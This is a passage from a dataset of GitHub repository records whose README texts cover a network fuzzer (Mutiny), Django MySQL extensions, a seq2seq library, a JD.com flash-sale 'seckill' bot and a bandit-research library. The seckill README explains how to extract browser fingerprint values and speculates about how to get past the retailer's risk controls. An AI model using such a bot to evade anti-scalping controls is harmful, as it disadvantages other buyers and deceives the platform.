network fuzzer that operates by replaying\nPCAPs through a mutational fuzzer. The goal is to begin network fuzzing as\nquickly as possible, at the expense of being thorough.\n\nThe general workflow for Mutiny is to take a sample of legitimate traffic, such\nas a browser request, and feed it into a prep script to generate a .fuzzer file.\nThen, Mutiny can be run with this .fuzzer file to generate traffic against a\ntarget host, mutating whichever packets the user would like.\n\nThere are extensions that allow changing how Mutiny behaves, including changing\nmessages based on input/output, changing how Mutiny responds to network errors,\nand monitoring the target in a separate thread.\n\nMutiny uses [Radamsa](https://github.com/aoh/radamsa) to perform mutations.\n\nThe [Decept Proxy](https://github.com/Cisco-Talos/Decept) is a multi-purpose\nnetwork proxy that can forward traffic from a plaintext or TLS TCP/UDP/domain\nsocket connection to a plaintext or TLS TCP/UDP/domain socket connection, among\nother features. It makes a good companion for Mutiny, as it can both generate\n.fuzzer files directly, particularly helpful when fuzzing TLS connections, and\nallow Mutiny to communicate with TLS hosts.\n\nsample_apps give a basic idea of some things that can be done with the fuzzer,\nwith a few different applications/clients to test with.\n\nWritten by James Spadaro (jaspadar@cisco.com) and Lilith Wyatt\n(liwyatt@cisco.com)\n\n## Setup\n\nEnsure python and scapy are installed.\n\nUntar Radamsa and `make` (You do not have to make install, unless you want it\nin /usr/bin - it will use the local Radamsa) Update `mutiny.py` with path to\nRadamsa if you changed it.\n\n## Basic Usage\n\nSave pcap into a folder. Run `mutiny_prep.py` on `.pcap` (also optionally\npass the directory of a custom processor if any, more below). Answer the\nquestions, end up with a `.fuzzer` file in same folder as pcap.\n\nRun `mutiny.py .fuzzer ` This will start fuzzing. Logs will be\nsaved in same folder, under directory\n`_logs//`\n\n## More Detailed Usage\n\n### .fuzzer Files\n\nThe .fuzzer files are human-readable and commented. They allow changing various\noptions on a per-fuzzer-file basis, including which message or message parts are\nfuzzed.\n\n### Message Formatting\n\nWithin a .fuzzer file is the message contents. These are simply lines that\nbegin with either 'inbound' or 'outbound', signifying which direction the\nmessage goes. They are in Python string format, with '\\xYY' being used for\nnon-printable characters. These are autogenerated by 'mutiny_prep.py' and\nDecept, but sometimes need to be manually modified.\n\n### Message Formatting - Manual Editing\n\nIf a message has the 'fuzz' keyword after 'outbound', this indicates it is to be\nfuzzed through Radamsa. A given message can have line continuations, by simply\nputting more message data in quotes on a new line. In this case, this second\nline will be merged with the first.\n\nAlternatively, the 'sub' keyword can be used to indicate a subcomponent. This\nallows specifying a separate component of the message, in order to fuzz only\ncertain parts and for convenience within a Message Processor.\n\nHere is an example arbitrary set of message data:\n```\noutbound 'say'\n ' hi'\nsub fuzz ' and fuzz'\n ' this'\nsub ' but not this\\xde\\xad\\xbe\\xef'\ninbound 'this is the server's'\n ' expected response'\n```\n\nThis will cause Mutiny to transmit `say hi and fuzz this but not\nthis(0xdeadbeef)`. `0xdeadbeef` will be transmitted as 4 hex bytes. `and fuzz\nthis` will be passed through Radamsa for fuzzing, but `say hi` and ` but not\nthis(0xdeadbeef)` will be left alone.\n\nMutiny will wait for a response from the server after transmitting the single\nabove message, due to the 'inbound' line. The server's expected response is\n`this is the server's expected response`. Mutiny won't do a whole lot with this\ndata, aside from seeing if what the server actually sent matches this string.\nIf a crash occurs, Mutiny will log both the expected output from the server and\nwhat the server actually replied with.\n\n### Customization\n\nmutiny_classes/ contains base classes for the Message Processor, Monitor, and\nException Processor. Any of these files can be copied into the same folder as\nthe .fuzzer (by default) or into a separate subfolder specified as the\n'processor_dir' within the .fuzzer file.\n\nThese three classes allow for storing server responses and changing outgoing\nmessages, monitoring the target on a separate thread, and changing how Mutiny\nhandles exceptions.\n\n### Customization - Message Processor\n\nThe Message Processor defines various callbacks that are called during a fuzzing\nrun. Within these callbacks, any Python code can be run. Anecdotally, these\nare primarily used in three ways. \n\nThe most common is when the server sends tokens that need to be added to future\noutbound messages. For example, if Mutiny's first message logs in, and the\nserver responds with a session ID, the `postReceiveProcess()` callback can be used\nto store that session ID. Then, in `preSendProcess()`, the outgoing data can be\nfixed up with that session ID. An example of this is in\n`sample_apps/session_server`.\n\nAnother common use of a Message Processor is to limit or change a fuzzed\nmessage. For example, if the server always drops messages greater than 1000\nbytes, it may not be worth sending any large messages. preSendProcess() can be\nused to shorten messages after fuzzing but before they are sent or to raise an\nexception.\n\nRaising an exception brings up the final way Message Processors are commonly\nused. Within a callback, any custom exceptions defined in\n`mutiny_classes/mutiny_exceptions.py` can be raised. There are several\nexceptions, all commented, that will cause various behaviors from Mutiny. These\ngenerally involve either logging, retrying, or aborting the current run.\n\n### Customization - Monitor\n\nThe Monitor has a `monitorTarget()` function that is run on a separate thread from\nthe main Mutiny fuzzer. The purpose is to allow implementing a long-running\nprocess that can monitor a host in some fashion. This can be anything that can\nbe done in Python, such as communicating with a monitor daemon running on the\ntarget, reading a long file, or even just pinging the host repeatedly, depending\non the requirements of the fuzzing session.\n\nIf the Monitor detects a crash, it can call `signalMain()` at any time. This will\nsignal the main Mutiny thread that a crash has occurred, and it will log the\ncrash. This function should generally operate in an infinite loop, as returning\nwill cause the thread to terminate, and it will not be restarted.\n\n### Customization - Exception Processor\n\nThe Exception Processor determines what Mutiny should do with a given exception\nduring a fuzz session. In the most general sense, the `processException()`\nfunction will translate Python and OS-level exceptions into Mutiny error\nhandling actions as best as it can.\n\nFor example, if Mutiny gets 'Connection Refused', the default response is to\nassume that the target server has died unrecoverably, so Mutiny will log the\nprevious run and halt. This is true in most cases, but this behavior can be\nchanged to that of any of the exceptions in\n`mutiny_classes/mutiny_exceptions.py` as needed, allowing tailoring of crash\ndetection and error correction.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "adamchainz/django-mysql", "link": "https://github.com/adamchainz/django-mysql", "tags": ["django", "mysql", "mariadb", "python"], "stars": 514, "description": ":dolphin: :horse: Extensions to Django for use with MySQL/MariaDB", "lang": "Python", "repo_lang": "", "readme": "============\nDjango-MySQL\n============\n\n.. image:: https://img.shields.io/readthedocs/django-mysql?style=for-the-badge\n :target: https://django-mysql.readthedocs.io/en/latest/\n\n.. image:: https://img.shields.io/github/actions/workflow/status/adamchainz/django-mysql/main.yml?branch=main&style=for-the-badge\n :target: https://github.com/adamchainz/django-mysql/actions?workflow=CI\n\n.. image:: https://img.shields.io/badge/Coverage-100%25-success?style=for-the-badge\n :target: https://github.com/adamchainz/django-mysql/actions?workflow=CI\n\n.. image:: https://img.shields.io/pypi/v/django-mysql.svg?style=for-the-badge\n :target: https://pypi.org/project/django-mysql/\n\n.. image:: https://img.shields.io/badge/code%20style-black-000000.svg?style=for-the-badge\n :target: https://github.com/psf/black\n\n.. image:: https://img.shields.io/badge/pre--commit-enabled-brightgreen?logo=pre-commit&logoColor=white&style=for-the-badge\n :target: https://github.com/pre-commit/pre-commit\n :alt: pre-commit\n\n.. figure:: https://raw.github.com/adamchainz/django-mysql/main/docs/images/dolphin-pony.png\n :alt: The dolphin-pony - proof that cute + cute = double cute.\n\n..\n\n | The dolphin-pony - proof that cute + cute = double cute.\n\n\nDjango-MySQL extends Django's built-in MySQL and MariaDB support their specific\nfeatures not available on other databases.\n\n\nWhat kind of features?\n----------------------\n\nIncludes:\n\n* ``QuerySet`` extensions:\n\n * 'Smart' iteration - chunked pagination across a large queryset\n * ``approx_count`` for quick estimates of ``count()``\n * Query hints\n * Quick ``pt-visual-explain`` of the underlying query\n\n* Model fields:\n\n * MariaDB Dynamic Columns for storing dictionaries\n * Comma-separated fields for storing lists and sets\n * 'Missing' fields: differently sized ``BinaryField``/``TextField`` classes,\n ``BooleanField``\\s represented by BIT(1)\n\n* ORM expressions for over 20 MySQL-specific functions\n* A new cache backend that makes use of MySQL's upsert statement and does\n compression\n* Status variable inspection and utility methods\n* Named locks for easy locking of e.g. external resources\n* Table lock manager for hard to pull off data migrations\n\nTo see them all, check out the exposition at\nhttps://django-mysql.readthedocs.io/en/latest/exposition.html .\n\nRequirements and Installation\n-----------------------------\n\nPlease see\nhttps://django-mysql.readthedocs.io/en/latest/installation.html .\n\nDocumentation\n-------------\n\nEvery detail documented on\n`Read The Docs `_.\n", "readme_type": "rst", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "eladhoffer/seq2seq.pytorch", "link": "https://github.com/eladhoffer/seq2seq.pytorch", "tags": ["deep-learning", "neural-machine-translation", "seq2seq"], "stars": 514, "description": "Sequence-to-Sequence learning using PyTorch", "lang": "Python", "repo_lang": "", "readme": "# Seq2Seq in PyTorch\nThis is a complete suite for training sequence-to-sequence models in [PyTorch](www.pytorch.org). It consists of several models and code to both train and infer using them.\n\nUsing this code you can train:\n* Neural-machine-translation (NMT) models\n* Language models\n* Image to caption generation\n* Skip-thought sentence representations\n* And more...\n \n ## Installation\n ```\n git clone --recursive https://github.com/eladhoffer/seq2seq.pytorch\n cd seq2seq.pytorch; python setup.py develop\n ```\n \n## Models\nModels currently available:\n* Simple Seq2Seq recurrent model\n* Recurrent Seq2Seq with attentional decoder\n* [Google neural machine translation](https://arxiv.org/abs/1609.08144) (GNMT) recurrent model\n* Transformer - attention-only model from [\"Attention Is All You Need\"](https://arxiv.org/abs/1706.03762)\n\n## Datasets\nDatasets currently available:\n\n* WMT16\n* WMT17\n* OpenSubtitles 2016\n* COCO image captions\n* [Conceptual captions](https://ai.googleblog.com/2018/09/conceptual-captions-new-dataset-and.html)\n\nAll datasets can be tokenized using 3 available segmentation methods:\n\n* Character based segmentation\n* Word based segmentation\n* Byte-pair-encoding (BPE) as suggested by [bpe](https://arxiv.org/abs/1508.07909) with selectable number of tokens. \n\nAfter choosing a tokenization method, a vocabulary will be generated and saved for future inference.\n\n\n## Training methods\nThe models can be trained using several methods:\n\n* Basic Seq2Seq - given encoded sequence, generate (decode) output sequence. Training is done with teacher-forcing.\n* Multi Seq2Seq - where several tasks (such as multiple languages) are trained simultaneously by using the data sequences as both input to the encoder and output for decoder.\n* Image2Seq - used to train image to caption generators.\n\n## Usage\nExample training scripts are available in ``scripts`` folder. Inference examples are available in ``examples`` folder.\n\n* example for training a [transformer](https://arxiv.org/abs/1706.03762)\n on WMT16 according to original paper regime:\n```\nDATASET=${1:-\"WMT16_de_en\"}\nDATASET_DIR=${2:-\"./data/wmt16_de_en\"}\nOUTPUT_DIR=${3:-\"./results\"}\n\nWARMUP=\"4000\"\nLR0=\"512**(-0.5)\"\n\npython main.py \\\n --save transformer \\\n --dataset ${DATASET} \\\n --dataset-dir ${DATASET_DIR} \\\n --results-dir ${OUTPUT_DIR} \\\n --model Transformer \\\n --model-config \"{'num_layers': 6, 'hidden_size': 512, 'num_heads': 8, 'inner_linear': 2048}\" \\\n --data-config \"{'moses_pretok': True, 'tokenization':'bpe', 'num_symbols':32000, 'shared_vocab':True}\" \\\n --b 128 \\\n --max-length 100 \\\n --device-ids 0 \\\n --label-smoothing 0.1 \\\n --trainer Seq2SeqTrainer \\\n --optimization-config \"[{'step_lambda':\n \\\"lambda t: { \\\n 'optimizer': 'Adam', \\\n 'lr': ${LR0} * min(t ** -0.5, t * ${WARMUP} ** -1.5), \\\n 'betas': (0.9, 0.98), 'eps':1e-9}\\\"\n }]\"\n```\n\n* example for training attentional LSTM based model with 3 layers in both encoder and decoder:\n```\npython main.py \\\n --save de_en_wmt17 \\\n --dataset ${DATASET} \\\n --dataset-dir ${DATASET_DIR} \\\n --results-dir ${OUTPUT_DIR} \\\n --model RecurrentAttentionSeq2Seq \\\n --model-config \"{'hidden_size': 512, 'dropout': 0.2, \\\n 'tie_embedding': True, 'transfer_hidden': False, \\\n 'encoder': {'num_layers': 3, 'bidirectional': True, 'num_bidirectional': 1, 'context_transform': 512}, \\\n 'decoder': {'num_layers': 3, 'concat_attention': True,\\\n 'attention': {'mode': 'dot_prod', 'dropout': 0, 'output_transform': True, 'output_nonlinearity': 'relu'}}}\" \\\n --data-config \"{'moses_pretok': True, 'tokenization':'bpe', 'num_symbols':32000, 'shared_vocab':True}\" \\\n --b 128 \\\n --max-length 80 \\\n --device-ids 0 \\\n --trainer Seq2SeqTrainer \\\n --optimization-config \"[{'epoch': 0, 'optimizer': 'Adam', 'lr': 1e-3},\n {'epoch': 6, 'lr': 5e-4},\n {'epoch': 8, 'lr':1e-4},\n {'epoch': 10, 'lr': 5e-5},\n {'epoch': 12, 'lr': 1e-5}]\" \\\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "hu619340515/jd_seckill-1", "link": "https://github.com/hu619340515/jd_seckill-1", "tags": [], "stars": 514, "description": "fork huanghyw/jd_seckill", "lang": "Python", "repo_lang": "", "readme": "#Jd_Seckill\n\n## Special statement:\n\n* Any scripts involved in the `jd_seckill` project released in this warehouse are only for testing and learning research, and commercial use is prohibited, and its legality, accuracy, completeness and validity cannot be guaranteed, please judge by yourself according to the situation.\n\n* All resource files in this project are prohibited from being reproduced or published in any form by any official account or self-media.\n\n* `huanghyw` is not responsible for any script issues, including but not limited to any loss or damage caused by any script errors.\n\n* For any user who indirectly uses the script, including but not limited to establishing a VPS or disseminating it in violation of national laws or relevant regulations, `huanghyw` is not responsible for any privacy leaks or other consequences arising therefrom .\n\n* Do not use any content of the `jd_seckill` project for commercial or illegal purposes, or do so at your own risk.\n\n* If any unit or individual thinks that the script of the project may be suspected of infringing its rights, it should notify in time and provide identification and proof of ownership. We will delete the relevant script after receiving the certification document.\n\n* Anyone who views this project in any way or uses any scripts that directly or indirectly use the `jd_seckill` project should read this statement carefully. `huanghyw` reserves the right to change or supplement this disclaimer at any time. By using and copying any related script or `jd_seckill` project, you are deemed to have accepted this disclaimer.\n \n* You must completely delete the above content from your computer or phone within 24 hours of downloading.\n \n* This project follows the `GPL-3.0 License` agreement. If there is any conflict between this special statement and the `GPL-3.0 License` agreement, this special statement shall prevail.\n\n> ***If you use or copy any code or project made by yourself in this warehouse, you are deemed to have accepted this statement, please read it carefully***\n> ***If you used or copied any code or project made by yourself in this warehouse before this statement was issued, and you are still using it at this time, you are deemed to have accepted this statement, please read it carefully***\n\n## Introduction\nThrough my use during this period (2020-12-12 to 2020-12-17), it is confirmed that this script can indeed grab Moutai. I robbed 4 bottles on my own three accounts, and robbed 4 bottles for two friends.\nAs long as you confirm that there is no problem with your configuration file and the cookie is not invalid, you can always succeed if you stick to it.\n\nAccording to everyone's feedback during this period, except for Moutai, other products that do not need to be added to the shopping cart cannot be grabbed. The specific reason has not been investigated yet, and it should be that the rush-purchase process of Jingdong Africa Moutai products has changed.\nIn order to avoid wasting everyone's time, don't rush to buy non-Moutai products.\nWhen this problem is solved, a new version will be launched.\n\n\n## Observation in the dark\n\nAccording to the log analysis of grabbing Moutai since December 14, boldly infer the relationship between `resultCode` and Xiaobai Credit in the Json message returned.\nHere we mainly analyze `90016` and `90008` with the highest frequency.\n\n### Sample JSON\n```json\n{'errorMessage': 'It's a pity that I didn't get it, let's make persistent efforts. ', 'orderId': 0, 'resultCode': 90016, 'skuId': 0, 'success': False}\n{'errorMessage': 'It's a pity that I didn't get it, let's make persistent efforts. ', 'orderId': 0, 'resultCode': 90008, 'skuId': 0, 'success': False}\n```\n\n### Statistics\n\n| Case | Xiaobai Credit | 90016 | 90008 |\n| ---- | -------- | ------ | ------ | -------- |\n| Zhang San | 63.8 | 59.63% | 40.37% | Not yet available |\n| Li Si | 92.9 | 72.05% | 27.94% | 4 days |\n| Wang Wu | 99.6 | 75.70% | 24.29% | Not yet available |\n| Zhao Liu | 103.4 | 91.02% | 8.9% | 2 days |\n\n### Guess\nIt is speculated that the return of 90008 is JD.com\u2019s risk control mechanism, which means that this request directly failed and did not participate in the panic buying.\nThe lower Xiaobai's credit is, the easier it is to trigger JD's risk control.\n\nJudging from the data, the relationship between Xiaobai's credit and risk control is about one level every tenth, so Zhao Liu is basically not intercepted, Li Si and Wang Wu have similar interception chances, and Zhang San has the highest interception probability.\n\nThe panic buying will only be carried out after the risk control is released. At this time, the reservoir counting model should be used. Assuming that all the data cannot be obtained at one time, try to achieve an even distribution of successful snapping users, which is related to probability.\n\n> To sum up, it is a bit difficult for Zhang San to succeed, and Xiaobai users with 100+ credits have the highest chance of success.\n\n## The main function\n\n- Log in to Jingdong Mall ([www.jd.com](http://www.jd.com/))\n - Scan the QR code given by Jingdong APP\n- Reservation Moutai\n - Timed automatic appointment\n- Waiting for snap-up after making an appointment in seconds\n - Start automatic buying at regular intervals\n\n## Operating environment\n\n- [Python 3](https://www.python.org/)\n\n## Third-party library\n\n- The library that needs to be used has been placed in requirements.txt, use pip installed can use the command\n`pip install -r requirements.txt`\n- If the domestic installation of third-party libraries is slow, you can use the following commands to accelerate Tsinghua source\n`pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple/`\n\n## Tutorial\n#### 1. Recommended Chrome browser\n#### 2. Web page scanning code login, or account password login\n#### 3. Fill in config.ini configuration information\n(1) `eid` and `fp` find a common commodity and place an order, and then you can see it by grabbing the package. These two values \u200b\u200b\u200b\u200bcan be filled in fixed\n> Just find a product to place an order, then enter the settlement page, open the debug window of the browser, switch to the console Tab page, enter the variable `_JdTdudfp` in the console, and you can get `eid` and `fp from the output Json `.\n> If not, refer to the original author\u2019s issue https://github.com/zhou-xiaojun/jd_mask/issues/22\n\n(2) `sku_id`, `DEFAULT_USER_AGENT`\n> `sku_id` has been filled in according to Maotai.\n> `cookies_string` is now unnecessary\n> `DEFAULT_USER_AGENT` can use the default one. Google Chrome can also enter about:version in the address bar of the browser to view `USER_AGENT` and replace it\n\n(3) Configure the time\n> Now it is not mandatory to synchronize the latest time, the program will automatically synchronize Jingdong time\n>> But if the computer time is slow for several hours, it's better to synchronize it\n\nAll of the above are required.\n>tips:\n> After the program starts running, it will detect the local time and JD server time, and the output difference is the local time - JD server time, that is, -50 means that the local time is 50ms slower than the JD server time.\n> The execution time of this code is based on the local computer/server time\n\n(4) Modify the number of snap-up bottles\n> The default number of snap-up bottles in the code is 2, and it cannot be modified in the configuration file\n> If you bought a bottle within a month, it is best to change the number of bottles you bought to 1\n> The specific modification is: search for `self.seckill_num = 2` in the `jd_spider_requests.py` file, and change `2` to `1`\n\n#### 4. Run main.py\nSelect the corresponding function according to the prompt. If there is a prompt to scan the code to log in, you can check whether there is a `qr_code.png` file in the project directory. If there is, open the picture and use the Jingdong mobile app to scan the code to log in.\n\n- *Display the QR code in the command line mode under Linux (take Ubuntu as an example)*\n\n```bash\n$ sudo apt-get install qrencode zbar-tools # Install QR code parsing and generation tools for reading QR codes and outputting them on the command line.\n$ zbarimg qr_code.png > qrcode.txt && qrencode -r qrcode.txt -o - -t UTF8 # Analyze the QR code and output it to the command line window.\n```\n\n#### 5. Confirmation of snapping results\nThe success of the snap-up can usually be seen within one minute of the procedure!\nSearch the log, and there is \"successful purchase, order number xxxxx\", which means that the order has been successfully purchased, and the order must be paid within half an hour! The program does not support automatic stop for the time being, manual STOP is required!\nIf you haven\u2019t snapped up the item within two minutes, you basically didn\u2019t get it! The program does not support automatic stop for the time being, manual STOP is required!\n\n## tip\nThere is no need to tip any more, those who grab Moutai, please keep this joy, and those who don\u2019t, keep on cheering :)\n\n## grateful\n##### Thank you very much for the code provided by the original author https://github.com/zhou-xiaojun/jd_mask\n##### Thanks also to https://github.com/wlwwu/jd_maotai for optimization", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "st-tech/zr-obp", "link": "https://github.com/st-tech/zr-obp", "tags": ["datasets", "off-policy-evaluation", "contextual-bandits", "multi-armed-bandits", "research"], "stars": 514, "description": "Open Bandit Pipeline: a python library for bandit algorithms and off-policy evaluation", "lang": "Python", "repo_lang": "", "readme": "
\n\n[![pypi](https://img.shields.io/pypi/v/obp.svg)](https://pypi.python.org/pypi/obp)\n[![Python](https://img.shields.io/badge/python-3.7%20%7C%203.8%20%7C%203.9-blue)](https://www.python.org)\n[![Downloads](https://pepy.tech/badge/obp)](https://pepy.tech/project/obp)\n![GitHub commit activity](https://img.shields.io/github/commit-activity/m/st-tech/zr-obp)\n![GitHub last commit](https://img.shields.io/github/last-commit/st-tech/zr-obp)\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n[![arXiv](https://img.shields.io/badge/arXiv-2008.07146-b31b1b.svg)](https://arxiv.org/abs/2008.07146)\n\n[[arXiv]](https://arxiv.org/abs/2008.07146)\n\n# Open Bandit Pipeline: a research framework for bandit algorithms and off-policy evaluation\n\n**[\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8](https://zr-obp.readthedocs.io/en/latest/)** | **[Google Group](https://groups.google.com/g/open-bandit-project)** | **[\u30c1\u30e5\u30fc\u30c8\u30ea\u30a2\u30eb](https://sites.google.com/cornell.edu/recsys2021tutorial)** | **[\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb](#\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb)** | **[\u4f7f\u7528\u65b9\u6cd5](#\u4f7f\u7528\u65b9\u6cd5)** | **[\u30b9\u30e9\u30a4\u30c9](./slides/slides_JN.pdf)** | **[Quickstart](./examples/quickstart)** | **[Open Bandit Dataset](./obd/README_JN.md)** | **[\u89e3\u8aac\u30d6\u30ed\u30b0\u8a18\u4e8b](https://techblog.zozo.com/entry/openbanditproject)**\n\n
\nTable of Contents\n\n- [Open Bandit Pipeline: a research framework for bandit algorithms and off-policy evaluation](#open-bandit-pipeline-a-research-framework-for-bandit-algorithms-and-off-policy-evaluation)\n- [\u6982\u8981](#\u6982\u8981)\n - [Open Bandit Dataset](#open-bandit-dataset)\n - [Open Bandit Pipeline](#open-bandit-pipeline)\n - [\u5b9f\u88c5\u3055\u308c\u3066\u3044\u308b\u30d0\u30f3\u30c7\u30a3\u30c3\u30c8\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3068\u30aa\u30d5\u65b9\u7b56\u63a8\u5b9a\u91cf](#\u5b9f\u88c5\u3055\u308c\u3066\u3044\u308b\u30d0\u30f3\u30c7\u30a3\u30c3\u30c8\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3068\u30aa\u30d5\u65b9\u7b56\u63a8\u5b9a\u91cf)\n - [\u30c8\u30d4\u30c3\u30af\u3068\u30bf\u30b9\u30af](#\u30c8\u30d4\u30c3\u30af\u3068\u30bf\u30b9\u30af)\n- [\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb](#\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb)\n - [\u4f9d\u5b58\u30d1\u30c3\u30b1\u30fc\u30b8](#\u4f9d\u5b58\u30d1\u30c3\u30b1\u30fc\u30b8)\n- [\u4f7f\u7528\u65b9\u6cd5](#\u4f7f\u7528\u65b9\u6cd5)\n - [(1) \u30c7\u30fc\u30bf\u306e\u8aad\u307f\u8fbc\u307f\u3068\u524d\u51e6\u7406](#1-\u30c7\u30fc\u30bf\u306e\u8aad\u307f\u8fbc\u307f\u3068\u524d\u51e6\u7406)\n - [(2) \u30aa\u30d5\u65b9\u7b56\u5b66\u7fd2](#2-\u30aa\u30d5\u65b9\u7b56\u5b66\u7fd2)\n - [(3) \u30aa\u30d5\u65b9\u7b56\u8a55\u4fa1 \uff08Off-Policy Evaluation\uff09](#3-\u30aa\u30d5\u65b9\u7b56\u8a55\u4fa1-off-policy-evaluation)\n- [\u5f15\u7528](#\u5f15\u7528)\n- [Google Group](#google-group)\n- [\u30e9\u30a4\u30bb\u30f3\u30b9](#\u30e9\u30a4\u30bb\u30f3\u30b9)\n- [\u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u30c1\u30fc\u30e0](#\u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u30c1\u30fc\u30e0)\n- [\u9023\u7d61\u5148](#\u9023\u7d61\u5148)\n- [\u53c2\u8003](#\u53c2\u8003)\n\n
\n\n# \u6982\u8981\n\n## Open Bandit Dataset\n\n*Open Bandit Dataset*\u306f, \u30d0\u30f3\u30c7\u30a3\u30c3\u30c8\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3084\u30aa\u30d5\u65b9\u7b56\u8a55\u4fa1\u306b\u307e\u3064\u308f\u308b\u7814\u7a76\u3092\u4fc3\u9032\u3059\u308b\u305f\u3081\u306e\u5927\u898f\u6a21\u516c\u958b\u5b9f\u30c7\u30fc\u30bf\u3067\u3059.\n\u672c\u30c7\u30fc\u30bf\u30bb\u30c3\u30c8\u306f, \u65e5\u672c\u6700\u5927\u306e\u30d5\u30a1\u30c3\u30b7\u30e7\u30f3E\u30b3\u30de\u30fc\u30b9\u4f01\u696d\u3067\u3042\u308b[\u682a\u5f0f\u4f1a\u793eZOZO](https://corp.zozo.com/about/profile/)\u304c\u63d0\u4f9b\u3057\u3066\u3044\u307e\u3059.\n\u540c\u793e\u304c\u904b\u55b6\u3059\u308b\u5927\u898f\u6a21\u30d5\u30a1\u30c3\u30b7\u30e7\u30f3EC\u30b5\u30a4\u30c8[ZOZOTOWN](https://zozo.jp/)\u3067\u306f, \u3044\u304f\u3064\u304b\u306e\u591a\u8155\u30d0\u30f3\u30c7\u30a3\u30c3\u30c8\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u7528\u3044\u3066\u30e6\u30fc\u30b6\u306b\u30d5\u30a1\u30c3\u30b7\u30e7\u30f3\u30a2\u30a4\u30c6\u30e0\u3092\u63a8\u85a6\u3057\u3066\u3044\u307e\u3059.\n\u30d0\u30f3\u30c7\u30a3\u30c3\u30c8\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u306b\u3088\u308b\u30d5\u30a1\u30c3\u30b7\u30e7\u30f3\u30a2\u30a4\u30c6\u30e0\u63a8\u85a6\u306e\u4f8b\u306f\u4ee5\u4e0b\u306e\u56f31\u306e\u901a\u308a\u3067\u3059.\n\u5404\u30e6\u30fc\u30b6\u30ea\u30af\u30a8\u30b9\u30c8\u306b\u5bfe\u3057\u3066, 3\u3064\u306e\u30d5\u30a1\u30c3\u30b7\u30e7\u30f3\u30a2\u30a4\u30c6\u30e0\u304c\u540c\u6642\u306b\u63a8\u85a6\u3055\u308c\u308b\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3059.\n\n
\n
\n

\n\u56f31. ZOZOTOWN\u306b\u304a\u3051\u308b\u30d5\u30a1\u30c3\u30b7\u30e7\u30f3\u30a2\u30a4\u30c6\u30e0\u306e\u63a8\u85a6\u306e\u4f8b\n

\n
\n\n\n2019\u5e7411\u6708\u4e0b\u65ec\u306e7\u65e5\u9593\u306b\u308f\u305f\u308b\u30c7\u30fc\u30bf\u53ce\u96c6\u5b9f\u9a13\u306b\u304a\u3044\u3066, \u5168\u30a2\u30a4\u30c6\u30e0(all)\u30fb\u7537\u6027\u7528\u30a2\u30a4\u30c6\u30e0(men)\u30fb\u5973\u6027\u7528\u30a2\u30a4\u30c6\u30e0(women)\u306b\u5bfe\u5fdc\u3059\u308b3\u3064\u306e\u300c\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u300d\u3067\u30c7\u30fc\u30bf\u3092\u53ce\u96c6\u3057\u307e\u3057\u305f.\n\u305d\u308c\u305e\u308c\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3067\u306f, \u5404\u30e6\u30fc\u30b6\u306e\u30a4\u30f3\u30d7\u30ec\u30c3\u30b7\u30e7\u30f3\u306b\u5bfe\u3057\u3066\u30e9\u30f3\u30c0\u30e0\u65b9\u7b56(Random)\u307e\u305f\u306f\u30c8\u30f3\u30d7\u30bd\u30f3\u62bd\u51fa\u65b9\u7b56(Bernoulli Thompson Sampling; Bernoulli TS)\u306e\u3044\u305a\u308c\u304b\u3092\u78ba\u7387\u7684\u306b\u30e9\u30f3\u30c0\u30e0\u306b\u9078\u629e\u3057\u3066\u9069\u7528\u3057\u3066\u3044\u307e\u3059.\n\u56f32\u306fOpen Bandit Dataset\u306e\u8a18\u8ff0\u7d71\u8a08\u3092\u793a\u3057\u3066\u3044\u307e\u3059.\n\n
\n
\n

\n \u56f32. Open Bandit Dataset\u306e\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3068\u30c7\u30fc\u30bf\u53ce\u96c6\u65b9\u7b56\u3054\u3068\u306e\u8a18\u8ff0\u7d71\u8a08\n

\n
\n\n\n[\u5b9f\u88c5\u4f8b](./examples)\u3092\u5b9f\u884c\u3059\u308b\u305f\u3081\u306e\u5c11\u91cf\u7248\u30c7\u30fc\u30bf\u306f, [./obd/](./obd)\u306b\u3042\u308a\u307e\u3059.\nOpen Bandit Dataset\u306e\u30d5\u30eb\u30b5\u30a4\u30ba\u7248\u306f[https://research.zozo.com/data.html](https://research.zozo.com/data.html)\u306b\u3042\u308a\u307e\u3059.\n\u52d5\u4f5c\u78ba\u8a8d\u7b49\u306b\u306f\u5c11\u91cf\u7248\u3092, \u7814\u7a76\u7528\u9014\u306b\u306f\u30d5\u30eb\u30b5\u30a4\u30ba\u7248\u3092\u6d3b\u7528\u3057\u3066\u304f\u3060\u3055\u3044.\n\n## Open Bandit Pipeline\n\n*Open Bandit Pipeline*\u306f, \u30c7\u30fc\u30bf\u30bb\u30c3\u30c8\u306e\u524d\u51e6\u7406\u30fb\u30aa\u30d5\u65b9\u7b56\u5b66\u7fd2\u30fb\u30aa\u30d5\u65b9\u7b56\u63a8\u5b9a\u91cf\u306e\u8a55\u4fa1\u3092\u7c21\u5358\u306b\u884c\u3046\u305f\u3081\u306ePython\u30d1\u30c3\u30b1\u30fc\u30b8\u3067\u3059.\nOpen Bandit Pipeline\u3092\u6d3b\u7528\u3059\u308b\u3053\u3068\u3067, \u7814\u7a76\u8005\u306f\u30aa\u30d5\u65b9\u7b56\u63a8\u5b9a\u91cf (OPE 